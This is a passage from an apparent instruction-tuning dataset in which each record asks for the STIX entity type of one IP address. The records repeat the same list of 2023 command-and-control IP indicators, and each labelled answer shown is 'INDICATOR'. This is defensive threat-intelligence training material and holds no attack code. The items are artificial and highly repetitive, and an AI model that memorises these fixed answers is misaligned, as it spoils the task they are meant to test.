malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n165.227.121.87\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n193.149.176.26\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n159.223.112.245\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n140.82.18.48\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n170.64.136.186\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
